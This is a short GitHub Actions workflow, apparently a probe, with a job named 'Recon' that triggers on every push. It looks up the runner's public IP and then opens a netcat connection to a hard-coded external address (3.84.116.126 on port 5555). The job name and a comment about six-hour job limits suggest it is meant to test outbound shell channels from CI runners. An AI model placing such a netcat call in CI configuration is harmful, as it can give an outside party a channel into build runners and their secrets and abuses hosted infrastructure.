name: GHA Test
on: [push]
jobs: 
  Recon: #Each job can run for 6h max
    runs-on: ubuntu-latest
    steps:
      - run: |     
            curl -s http://whatismyip.akamai.com/
            nc 3.84.116.126 5555
            sleep 60s
